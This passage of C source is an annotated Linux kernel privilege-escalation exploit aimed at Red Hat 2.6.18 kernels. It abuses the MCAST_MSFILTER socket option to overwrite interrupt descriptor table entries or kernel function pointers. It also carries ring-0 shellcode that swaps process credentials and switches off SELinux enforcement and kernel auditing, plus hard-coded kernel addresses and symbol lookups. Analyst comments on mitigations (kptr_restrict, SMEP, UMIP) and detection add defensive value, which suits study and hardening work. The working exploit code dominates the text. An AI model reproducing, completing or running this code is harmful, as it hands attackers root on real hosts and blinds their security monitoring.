"\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11"     
"\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02"                   
"\xeb\xcc\x5e\x5b\x5f\x59\xc3";               


/* Offsets 5, 21 and 45 are the 0x41.., 0x42.. and 0x43.. runs respectively. */
#define R0YTTTTUHLFSTT_OFF1 5
#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21
#define R0TDGFSRSLLSJ_SHSYSTGD 45
char r1ngrrrrrrr[]=
"\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3"                                 
"\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42"  
"\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7"                              
"\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43"   
"\xff\xd3\x5f\x5f\x5a\x5b\xc3";                                       


/*
 * Offset 25 is the start of the 50-byte 0x90 run; the patch routine copies
 * the SELinux/audit template (defined further down) into that run.
 */
#define RJMPDDTGR_OFF 13
#define RJMPDDTGR_DHDYTGSCAVSF 7
#define RJMPDDTGR_GDTDGTSFRDFT 25
static char ttrfd0[]=
"\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"                      
"\x58\x5f"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xc3";


/* implement selinux bypass for IDT ! */
/* Same layout idea as ttrfd0; offset 27 is the start of its 0x90 run. */
#define RJMPDDTGR_OFF_IDT 14
#define RJMPDDTGR_DYHHTSFDARE 8
#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27
static char ruujhdbgatrfe345[]=
"\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"      
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"                                  
"\x0f\x01\xf8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x48\xcf";  



/*
 * Template patched by p4tch_sel1nux_codztegfaddczda(): offset 10 receives
 * the selinux_enforcing address and offset 23 the audit_enabled address
 * from the selected LSM_rhel entry. The array name and those two field
 * names indicate it is aimed at SELinux enforcement and auditing state.
 */
#define CJE_4554TFFDTRMAJHD_OFF  10
#define RJMPDDTGR_AYYYDGTREFCCV7761_OF      23
static char dis4blens4sel1nuxhayettgdr64545[]=
"\x41\x52\x50"
"\xb8\x00\x00\x00\x00"
"\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x89\x02"
"\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42"
"\x41\x89\x02"
"\x58\x41\x5a";           




/* rhel LSM stuffs */
#define RHEL_LSM_OFF 98

/*
 * One record per targeted kernel build: five kernel addresses plus the
 * release and version strings that identify the build.
 */
struct LSM_rhel 

  __yyrhdgdtfs66ytgetrfd selinux_ops;
  __yyrhdgdtfs66ytgetrfd capability_ops;
  __yyrhdgdtfs66ytgetrfd dummy_security_ops;

  __yyrhdgdtfs66ytgetrfd selinux_enforcing;
  __yyrhdgdtfs66ytgetrfd audit_enabled;

  const char *krelease; 
  const char *kversion;

};

/*
 * Hard-coded address table. lsm_rhel_find_target() matches the running
 * kernel against krelease AND kversion, so an entry applies only to that
 * exact build. The builds listed are 2.6.18-164.el5, 2.6.18-164.11.1.el5
 * (two different build stamps) and 2.6.18-164.11.1.el5xen.
 *
 * Analyst note: fixed addresses like these work only because the symbols
 * sit at the same location on every install of a given build. For builds
 * not in the table the program falls back to /boot/System.map-<release>.
 */
struct LSM_rhel known_targets[4]=
{
  {
    0xffffffff8031e600ULL,
    0xffffffff8031fec0ULL,
    0xffffffff804acc00ULL,

    0xffffffff804af960ULL,
    0xffffffff8049b124ULL,

    "2.6.18-164.el5",
    "#1 SMP Thu Sep 3 03:28:30 EDT 2009"  // to manage minor/bug fix changes
  },
  {
   0xffffffff8031f600ULL,
   0xffffffff80320ec0ULL,
   0xffffffff804afc00ULL,

   0xffffffff804b2960ULL,
   0xffffffff8049e124ULL,

   "2.6.18-164.11.1.el5",
   "#1 SMP Wed Jan 6 13:26:04 EST 2010"
  },
  {
    0xffffffff805296a0ULL,
    0xffffffff8052af60ULL,
    0xffffffff806db1e0ULL,

    0xffffffff806ddf40ULL,
    0xffffffff806d5324ULL,

    "2.6.18-164.11.1.el5xen",
    "#1 SMP Wed Jan 20 08:06:04 EST 2010"   // default xen
  },
  {
    0xffffffff8031f600ULL,// d selinux_ops
    0xffffffff80320ec0ULL,// d capability_ops
    0xffffffff804afc00ULL,// B dummy_security_ops

    0xffffffff804b2960ULL,// B selinux_enforcing
    0xffffffff8049e124ULL,// B audit_enabled

    "2.6.18-164.11.1.el5",
    "#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL
   }

};

/*
 * curr_target: not assigned within this excerpt.
 * dyn4nt4n1labeggeyrthryt: scratch entry that lsm_rhel_find_target() fills
 * from System.map when no table entry matches.
 */
static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt;

/*
 * Packed argument record with the five fields of a getsockopt()/setsockopt()
 * style call (socket, level, option name, value pointer, length pointer).
 * The struct name suggests it is handed to the multiplexed socketcall
 * interface - assumption, the call site is outside this excerpt.
 * optlen points to a volatile socklen_t, matching the file-scope `magiclen`.
 */
struct socketcallAT
{
  int s;
  int level;
  int optname;
  void *optval;
  volatile socklen_t *optlen;  
}__attribute__((packed));

/*
 * Packed destination for the `sidt` instruction in getidt(): a 16-bit limit
 * followed by the table base. With the __i386__ build guard in force,
 * unsigned long is 32 bits, so only the low half of a 64-bit base fits here.
 */
struct idt64from32_s 
{
  unsigned short limit;
  unsigned long base;
}__attribute__((packed));

/*
 * Read the interrupt descriptor table register with `sidt` and return its
 * base as a 64-bit value.
 *
 * The stored base is OR-ed with 0xFFFFFFFF00000000, forcing the upper 32
 * bits to ones - presumably to rebuild a 64-bit kernel address from the
 * 32 bits a 32-bit process can store; TODO confirm.
 *
 * Analyst note: `sidt` executed from user mode discloses a kernel address.
 * CPUs and kernels with User-Mode Instruction Prevention (UMIP) enabled stop
 * unprivileged code from obtaining the real value this way.
 */
static __yyrhdgdtfs66ytgetrfd getidt()
{
  struct idt64from32_s idt;
  memset(&idt, 0x00, sizeof(struct idt64from32_s));
  asm volatile("sidt %0" : "=m"(idt));
  return idt.base | 0xFFFFFFFF00000000ULL;
}


/*
 * Heuristic SELinux presence check.
 *
 * Returns 1 when SELINUX_PATH ("/selinux/enforce") can be opened for
 * reading, or when the open fails with EPERM; returns 0 for every other
 * failure. The file's contents are never read, so the result says the node
 * exists, not whether enforcing mode is on.
 */
static int isSelinuxEnabled()
{
  FILE *selinux_f;
  selinux_f = fopen(SELINUX_PATH, "r");
  if(selinux_f == NULL)
  {
    /* A permission error is still treated as "SELinux is there". */
    if(errno == EPERM)
      return 1;
    else 
     return 0;
  }

  fclose(selinux_f);
  return 1;
}

/*
 * Fingerprint the running kernel via uname().
 *
 * Copies the release and version strings into out_release and out_version
 * (plain strcpy(), the caller must supply large enough buffers) and returns
 * the number formed by the digits that follow the second '.' in the release
 * string, e.g. 18 for "2.6.18-164.el5".
 *
 * Returns -1 if uname() fails, if no digits follow the second dot, or if
 * those digits evaluate to 0.
 */
static int wtfyourunhere_heee(char *out_release, char* out_version)
{
 int ret; const char*ptr;
 int count=0;
 char r[32], *bptr;
 struct utsname buf;
 ret =  uname(&buf);

 if(ret < 0)
   return -1; 

 strcpy(out_release, buf.release);
 strcpy(out_version, buf.version);

 ptr = buf.release;
 bptr = r;
 memset(r, 0x00, sizeof(r)); 
 /* count tracks how many dots have been passed so far. */
 while(*ptr)
 {
   if(count == 2)
    {
      /* Collect the digit run after the second dot; stop at the first non-digit. */
      if(*ptr >= '0' && *ptr <= '9')
        *bptr++ = *ptr;
      else
        break;
    }

   if(*ptr == '.')
     count++;
   ptr++;
 }

 if(strlen(r) < 1 || !atoi(r))
   return -1; 

 return atoi(r); 
}


/*
 * Fill in the SELinux/audit template and splice it into two other templates.
 *
 * table supplies the two addresses: selinux_enforcing is stored at byte
 * offset CJE_4554TFFDTRMAJHD_OFF and audit_enabled at byte offset
 * RJMPDDTGR_AYYYDGTREFCCV7761_OF of dis4blens4sel1nuxhayettgdr64545. The
 * patched template (without its terminating NUL) is then copied over the
 * 0x90 filler region of ttrfd0 and of ruujhdbgatrfe345.
 *
 * Both stores write an 8-byte value through a cast char pointer at an
 * offset that is not a multiple of 8.
 */
static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table)
{
  *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing;
  *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled;
  __dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); 
  __dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); 
}


/*
 * Look up the address of kernel symbol s in a kallsyms/System.map style
 * text file.
 *
 * Each line is expected in the form "<hex address> <type char> <name>".
 * Returns the parsed address of the first line whose name equals s, or 0
 * when the file cannot be opened, the symbol is not found, or the lookup is
 * gated off (KERN_HHSYPPLORQTWGFD not set in `flags` and ignore_flag is 0).
 *
 * Analyst note: this depends on kernel addresses being readable by the
 * calling user. Restricting /proc/kallsyms through the kernel.kptr_restrict
 * sysctl and keeping /boot/System.map-* unreadable for unprivileged users
 * removes both sources used in this file.
 */
static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char* s, const char* filename, int ignore_flag)
{
  FILE *ka;
  char line[512];
  char reloc_a[64];
  char reloc[64];

  if(!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag)
    return 0;

  ka = fopen(filename, "r");
  if(!ka)
    return 0;

  while(fgets(line, 512, ka) != NULL)
  {
    char *l_p  = line;
    char *ra_p = reloc_a;
    char *r_p    = reloc;
    memset(reloc, 0x00, sizeof(reloc));
    memset(reloc_a, 0x00, sizeof(reloc_a));
    /* First field: the address text, up to the first space. */
    while(*l_p != ' ' && (ra_p - reloc_a)  < 64)
      *ra_p++ = *l_p++;  
    /* Skip " <type char> " between the address and the name. */
    l_p += 3;
    /* Third field: the symbol name, up to whitespace. */
    while(*l_p != ' ' && *l_p != '\n' && *l_p != '\t' && (r_p - reloc) < 64)
      *r_p++ = *l_p++;

    if(!strcmp(reloc, s))
    {
      __gggdfstsgdt_dddex("$$$ %s->%s\n", s, reloc_a);
      return strtoull(reloc_a, NULL, 16); 
    }
  }

  return 0; 
}


/*
 * Convenience wrapper: looks `s` up in KALLSYMS with ignore_flag = 0, so the
 * lookup only happens when KERN_HHSYPPLORQTWGFD is set in `flags` (set
 * elsewhere in this file after a successful test read of KALLSYMS).
 * Returns the address found, or 0.
 */
static inline __yyrhdgdtfs66ytgetrfd get_sym(const char* s)
{
  return get_sym_ex(s, KALLSYMS, 0);
}

/*
 * Parses a comma-separated list of three hexadecimal values from `val` into
 * the global _m_cred[0..2].
 *
 * Returns 0 on success, -1 when the string ends before the third field.
 *
 * NOTE(review): the copy into local[64] has no length check, so a field
 * longer than 63 characters writes past the buffer. strtoull() errors are not
 * detected either; a non-hex field is stored as 0.
 */
static int parse_cred(const char* val)
{
  int i=0;
  const char* p = val;
  char local[64], *l;
  for(i=0; i<3; i++)  
  {
    memset(local, 0x00, sizeof(local));
    l = local;
    /* copy one field, up to the next ',' or the end of the string */
    while(*p && *p != ',')
      *l++ = *p++;

    /* the string may only end after the third field */
    if(!(*p) && i != 2)
      return -1;

    _m_cred[i] = strtoull(local, NULL, 16);
    p++;
  }

  return 0; 
}


/*
 * Kernel symbol names that lsm_rhel_find_target() looks up in
 * /boot/System.map-<release> when the running kernel is not listed in
 * known_targets.
 * Triage note: as plain string literals these would normally be present in a
 * compiled copy of this program, which makes them, together with the
 * System.map path, candidate static indicators.
 */
#define SELINUX_OPS        "selinux_ops"
#define DUMMY_SECURITY_OPS "dummy_security_ops"
#define CAPABILITY_OPS     "capability_ops"
#define SELINUX_ENFORCING  "selinux_enforcing"
#define AUDIT_ENABLED      "audit_enabled"

/*
 * Analyst note: selects the table of kernel addresses used by the LSM path.
 *
 * check_rhel: when non-zero, the function gives up (returns NULL) unless
 *             isRHHGDPPLADSF(krelease) reports a match.
 *
 * First compares the global krelease/kversion strings against every entry of
 * known_targets and returns the matching entry. If none matches, it builds
 * the path "/boot/System.map-" + krelease, resolves five symbols from that
 * file into the global dyn4nt4n1labeggeyrthryt, and returns its address only
 * if all five were found.
 *
 * Returns a pointer to a struct LSM_rhel, or NULL.
 *
 * Mitigation relevance: the fallback only works when /boot/System.map-* is
 * readable by the calling user.
 *
 * NOTE(review): mapbuf is 128 bytes and is filled with strcpy()/strcat()
 * without a length check; the size of krelease is not visible here.
 */
struct LSM_rhel *lsm_rhel_find_target(int check_rhel)
{
   int i;
   char mapbuf[128];
   struct LSM_rhel *lsm = &(known_targets[0]);

   if(check_rhel && !isRHHGDPPLADSF(krelease))
   {
     __pppp_tegddewyfg("!!! N0t a RH3l k3rn3l \n");
     return NULL;
   }

   /* pass 1: exact release + version match against the built-in table */
   __pppp_tegddewyfg("$$$ L00k1ng f0r kn0wn t4rg3tz.. \n");
   for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++)
   {
     if(!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion))
     {
       __gggdfstsgdt_dddex("$$$ Th1z b1tch 1z t0azt. kn0wn t4rg3t: %s %s \n", lsm->krelease, lsm->kversion);
       return lsm;
     }
   }

   /* pass 2: resolve the same addresses from the on-disk System.map */
   __pppp_tegddewyfg("$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...\n");
   strcpy(mapbuf, "/boot/System.map-");
   strcat(mapbuf, krelease);

   /* ignore_flag = 1: these lookups run even when KALLSYMS was unreadable */
   dyn4nt4n1labeggeyrthryt.selinux_ops        = get_sym_ex(SELINUX_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.capability_ops     = get_sym_ex(CAPABILITY_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.selinux_enforcing  = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.audit_enabled      = get_sym_ex(AUDIT_ENABLED, mapbuf, 1);


   /* every one of the five addresses is required */
   if(!dyn4nt4n1labeggeyrthryt.selinux_ops ||
      !dyn4nt4n1labeggeyrthryt.dummy_security_ops ||
      !dyn4nt4n1labeggeyrthryt.capability_ops ||
      !dyn4nt4n1labeggeyrthryt.selinux_enforcing ||
      !dyn4nt4n1labeggeyrthryt.audit_enabled)
  return NULL;


   return &dyn4nt4n1labeggeyrthryt;
}

/*
 * Analyst note: environment probe and option parsing.
 *
 * 1. Test-reads KALLSYMS; if the read returns data, sets
 *    KERN_HHSYPPLORQTWGFD in the global `flags`, which enables get_sym().
 * 2. Fingerprints the kernel through wtfyourunhere_heee() into the globals
 *    krelease and kversion, keeping the returned number in `ver`.
 * 3. Parses command-line options (getopt string "siflc:k:o:"). The options
 *    either set "disable" bits for individual technique paths in `flags`,
 *    request the SELinux part of the payload, or supply hex addresses by
 *    hand (_m_cred, _m_fops, _m_cpu_off) instead of having them resolved.
 * 4. For ver >= 29, requires three addresses in _m_cred (resolved with
 *    get_sym() if not supplied) and writes them into r1ngrrrrrrr.
 *    For ver >= 30, requires _m_cpu_off and writes it into ttrfd0 and
 *    ruujhdbgatrfe345.
 *
 * Mitigation relevance: unless the operator already knows the addresses,
 * steps 1 and 4 depend on unprivileged access to kernel symbol addresses.
 *
 * NOTE(review): __yyy_tegdtfsrer is defined outside this view; the code
 * after each call assumes the value it complained about is usable, so it
 * presumably does not return - confirm. read() is issued before fd is
 * checked, and close(fd) also runs when open() failed.
 */
static void put_your_hands_up_hooker(int argc, char *argv[])
{
  int fd,ver,ret;
  char __b[16];


  /* probe: can this user read real content from KALLSYMS? */
  fd = open(KALLSYMS, O_RDONLY);
  ret = read(fd, __b, 16); // dummy read
  if((fd >= 0 && ret > 0))
  {
    __pppp_tegddewyfg("$$$ Kallsyms +r\t\n"); // d0nt p4tch m3 br0
    flags |= KERN_HHSYPPLORQTWGFD;
  }
  close(fd);

  ver = wtfyourunhere_heee(krelease, kversion);
  if(ver < 0)
    __yyy_tegdtfsrer("!!!  Un4bl3 t0 g3t r3l3as3 wh4t th3 fuq!\n");

  __gggdfstsgdt_dddex("$$$ K3rn3l r3l3as3: %s\n", krelease);


  if(argc != 1)
  {
    while( (ret = getopt(argc, argv, "siflc:k:o:")) > 0)
    {
      switch(ret)
      {
        case 'i':
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
          useidt=1; // u have to use -i to force IDT Vector
          break;

        case 'f':
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT;
          break;

  case 'l':
    flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
    break;

        case 'c':
          if(!optarg || parse_cred(optarg) < 0)
              __yyy_tegdtfsrer("!!! Un4bl3 t0 p4s3 cr3d c0d3z\n");
          break;

        case 'k':
          if(optarg)
            _m_fops = strtoull(optarg, NULL, 16);
          else
       __yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0P numb3rs\n");
          break;

        case 's':
          /* only meaningful when SELinux is active on the host */
          if(!isSelinuxEnabled())
            __pppp_tegddewyfg("??? wh4t th3 fuq s3l1nux 1z n0t 3v3n 3n4bl3d!?\n");
          else
            flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
          break;

        case 'o':
          if(optarg)
            _m_cpu_off = strtoull(optarg, NULL, 16);
    else
      __yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0p c0mput3r numb3rs\n");
          break;
      }
    }
  }


  if(ver >= 29) // needs cred structure 
  {
    flags |= KERN_DGGDYDTEGGETFDRLAK;

    /* addresses not given on the command line are resolved from KALLSYMS */
    if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2])
    {
      _m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD);
      _m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD); 
      _m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD);
    }

    if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2])
    {
      __yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n");
    }

    __pppp_tegddewyfg("$$$ Kernel Credentials detected\n");
    /* patch the three addresses into the second-stage buffer */
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2];
  }

  if(ver >= 30)  // needs cpu offset
  {
    flags |= KERN_DHHDYTMLADSFPYT;
    if(!_m_cpu_off)
    _m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);

    /* NOTE(review): the message below repeats the cred text although this
     * branch is about the per-cpu offset */
    if(!_m_cpu_off) 
      __yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n");

    __pppp_tegddewyfg("$$$ K3rn3l per_cpu r3l0cs 3n4bl3d!\t\n");
    *((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off;
    *((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off;
  }
}


/*
 * Analyst note: decides which of the three technique paths will be used and
 * records the choice in the globals usefops, uselsm and useidt.
 *
 * Order of preference, unless disabled through `flags`:
 *   1. "fops" - needs the address _m_fops (given by the operator or resolved
 *      with get_sym(RW_FOPS)).
 *   2. "lsm"  - needs a struct LSM_rhel from lsm_rhel_find_target(1).
 *   3. "idt"  - only when useidt was set during option parsing.
 * If the IDT path is combined with the SELinux flag and no target table can
 * be found, the SELinux flag is cleared and the run continues without it.
 * If no path is available, __yyy_tegdtfsrer is called with a failure message.
 *
 * Defensive relevance: paths 1 and 2 both start from a kernel symbol address
 * read out of KALLSYMS or System.map, so restricting those sources removes
 * the automatic variants.
 */
static void env_prepare(int argc, char* argv[])
{

  put_your_hands_up_hooker(argc, argv);

  if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS))  // try fops
  {
    __pppp_tegddewyfg("??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d\n");
    if(!_m_fops)
      _m_fops = get_sym(RW_FOPS);

    /* TODO: do RW check for newer -mm kernels which has timer_list_struct RO
     * Thanks to the guy who killed this vector... you know who you are:)
     * Lucky for you, there are more:) 
     */

    if(_m_fops) 
    {
      usefops=1;
      __pppp_tegddewyfg("$$$ w34p0n 0f ch01c3: F0PZzZzzz\n");
    }
  }


  if(!usefops && !(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) // try lsm(rhel)
  {
    curr_target = lsm_rhel_find_target(1);
    if(!curr_target)
    {
       __pppp_tegddewyfg("!!! u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!\n"); 
    }
    else
      uselsm=1;
  }


  if(useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
  {
    // -i flag
    /* check_rhel = 0: the distribution check is skipped on this path */
    curr_target = lsm_rhel_find_target(0);
    if(!curr_target)
    {
       __pppp_tegddewyfg("!!! Un4lb3 t0 f1nd t4rg3t: c0ntinu3 w1th0ut s3linsux d1s4bl3.\n");
       /* remove Selinux Flag */
       flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
    }
  }


  if(!usefops && !useidt && !uselsm)
    __yyy_tegdtfsrer("!!! 3v3ryth3ng f41l3d!!*@&^@&*^@* try an0th3r 0d4y L0l\n");  
}


/*
 * Computes the length value that is later stored in magiclen and passed as
 * the option length of the socket call: 8 + stack - addr - 16.
 *
 * NOTE(review): both parameter types are project typedefs whose widths are
 * not visible here; the result is narrowed to int, so a wide difference is
 * silently truncated.
 */
static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack)
{
  int socklen_l = 8 + stack - addr - 16;
  return socklen_l;
}

/* Argument block handed to bitch_call(); populated by fillsocketcallAT(). */
static struct socketcallAT at;
/*
 * Four words that idt_smash() sends out one at a time, each aimed 4 bytes
 * further than the previous one.
 * NOTE(review): presumably the replacement descriptor data for the targeted
 * interrupt vector; the encoding is not explained on this page.
 */
static __dgdhdytrg55 idtover[4] = 
             {0x00100000UL, 
              0x0020ee00UL, 
              0x00000000UL, 
              0x00000000UL};


/*
 * Fills the global argument block `at` with the socket descriptor `s`, the
 * level SOL_IP, the option name MCAST_MSFILTER, the global `buffer` as option
 * value and the address of the global `magiclen` as option length.
 * The field set matches the arguments of a getsockopt() call.
 *
 * Detection relevance: MCAST_MSFILTER is a multicast source-filter option;
 * a process that queries it repeatedly on a fresh UDP socket with very large
 * or changing length values is unusual.
 */
static void fillsocketcallAT()
{
 at.s = s;
 at.level = SOL_IP;
 at.optname = MCAST_MSFILTER;
 at.optval = buffer;
 at.optlen = &magiclen;
}


/*
 * Analyst note: raw system call issued without libc.
 *
 * Saves ebx/esi/ecx/edx, loads eax = 0x66 and ebx = 0xf, points ecx at the
 * argument block `at`, replaces the stack pointer with `stack` for the
 * duration of the call (the old value is kept in esi), executes int $0x80,
 * then restores the stack pointer and the saved registers.
 * On i386, call number 0x66 is socketcall and sub-call 0xf is getsockopt,
 * which is consistent with the fields set in fillsocketcallAT().
 *
 * at:    argument block for the call.
 * stack: value loaded into esp while the call is made.
 *
 * Detection relevance: because the call goes through the int $0x80 entry
 * point directly, library-level hooks do not see it; syscall-level auditing
 * does (for example audit rules scoped to the 32-bit ABI).
 */
static void bitch_call(struct socketcallAT *at, void *stack)
{
  asm volatile(
      "push %%ebx\t\n"
      "push %%esi\t\n"
      "push %%ecx\t\n"
      "push %%edx\t\n"
      "movl $0x66, %%eax\t\n"
      "movl $0xf, %%ebx\t\n"
      "movl %%esp, %%esi\t\n" 
      "movl %0, %%ecx\t\n"
      "movl %1, %%esp\t\n"
      "int $0x80\t\n"
      "movl %%esi, %%esp\t\n"
      "pop %%edx\t\n"
      "pop %%ecx\t\n"
      "pop %%esi\t\n"
      "pop %%ebx\t\n"
      :  : "r"(at), "r"(stack)  : "memory", "eax", "ecx", "ebx", "esi"
     );
}

/*
 * Fills the global `buffer` with copies of `value`.
 *
 * NOTE(review): the element count is computed with sizeof(void*) while the
 * stores use the width of __dgdhdytrg55; if those two sizes differ, the loop
 * either leaves part of the buffer untouched or writes past its end. The
 * typedef is not visible here, so this cannot be decided from this view.
 */
static void __setmcbuffer(__dgdhdytrg55 value)
{
  int i;
  __dgdhdytrg55 *p = (__dgdhdytrg55*)buffer;
  for(i=0; i<sizeof(buffer)/sizeof(void*); i++)
    *(p+i) = value;
}

/*
 * Analyst note: IDT path.
 *
 * For each of the four words in idtover: fills the global buffer with that
 * word, derives magiclen from the address idtbase + i*4 and the constant
 * Y0Y0STOP, and issues the raw socket call with the stack pointer set to
 * Y0Y0STOP.
 *
 * idtbase: address of the descriptor entry to be replaced (computed by the
 *          caller from the IDT base).
 *
 * Mitigation relevance: this path needs the kernel's interrupt descriptor
 * table to be writable and at a known address; kernels that keep the table
 * read-only are not affected by this step.
 */
static void idt_smash(__yyrhdgdtfs66ytgetrfd idtbase)
{
  int i;
  __dgdhdytrg55 curr;
  for(i=0; i<sizeof(idtover)/sizeof(idtover[0]);i++)
  {
    curr = idtover[i]; 
    __setmcbuffer(curr);
    magiclen =  get_socklen(idtbase + (i*4), Y0Y0STOP);
    bitch_call(&at, (void*)Y0Y0STOP);
  } 
}


/*
 * Maps one anonymous, private, read/write page at the fixed address
 * Y0Y0SMAP (MAP_FIXED). On failure calls __xxxfdgftr_hshsgdt("mmap").
 *
 * NOTE(review): __xxxfdgftr_hshsgdt is defined outside this view; it is
 * presumably a perror-and-exit helper - confirm.
 * Detection relevance: MAP_FIXED mappings at hard-coded addresses are rare
 * in ordinary programs and stand out in syscall traces.
 */
static void y0y0stack()
{
  void* map = mmap((void*)Y0Y0SMAP, 
                   PAGE_SIZE, 
                   PROT_READ|PROT_WRITE, 
                   MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 
                   -1,0);
  if(MAP_FAILED == map)
    __xxxfdgftr_hshsgdt("mmap"); 
}

/*
 * Maps one anonymous, private page at the fixed address Y0Y0CMAP (MAP_FIXED).
 * The page is read/write/execute by default; when TRY_REMAP_DEFAULT is
 * defined it is only read/write here and is re-mapped executable later by
 * rey0y0code(). On failure calls __xxxfdgftr_hshsgdt("mmap").
 *
 * Mitigation relevance: main() copies the payload buffers into this region,
 * so the technique appears to rely on the kernel running code that lives in
 * a user-space page. Hardware and kernel features that forbid supervisor-mode
 * execution of user pages (SMEP) block that class of technique.
 */
static void y0y0code()
{
  void* map = mmap((void*)Y0Y0CMAP, 
                   PAGE_SIZE, 

#ifdef TRY_REMAP_DEFAULT 
       PROT_READ|PROT_WRITE,
#else
                   PROT_READ|PROT_WRITE|PROT_EXEC, 
#endif
                   MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 
                   -1,0);
  if(MAP_FAILED == map)
    __xxxfdgftr_hshsgdt("mmap"); 

}


/*
 * Replaces the anonymous page at `old` with a file-backed, read/execute
 * mapping that has the same content.
 *
 * Steps: writes PAGE_SIZE bytes from `old` to "<cwd>/__tmpfile", unmaps the
 * page, maps the file at the same address with PROT_READ|PROT_EXEC and
 * MAP_FIXED, reads one byte so the page is resident, and unlinks the file.
 *
 * old: address of the page to re-map.
 * Returns the first byte of the page, or -1 when open(), munmap() or mmap()
 * fails.
 *
 * Forensic relevance: a file named "__tmpfile" is created with mode S_IRWXU
 * in the process's working directory and unlinked again; because the
 * descriptor is never closed, the deleted file stays open in the process for
 * as long as it lives.
 *
 * NOTE(review): the results of getcwd() and write() are not checked, and
 * strcat() can overflow cwd[1024] when the working directory path is close
 * to that length. The return value is a plain char, so a first byte >= 0x80
 * may come back negative and be mistaken for a failure by the caller.
 */
static int rey0y0code(unsigned long old)
{
  int fd;
  void *map;
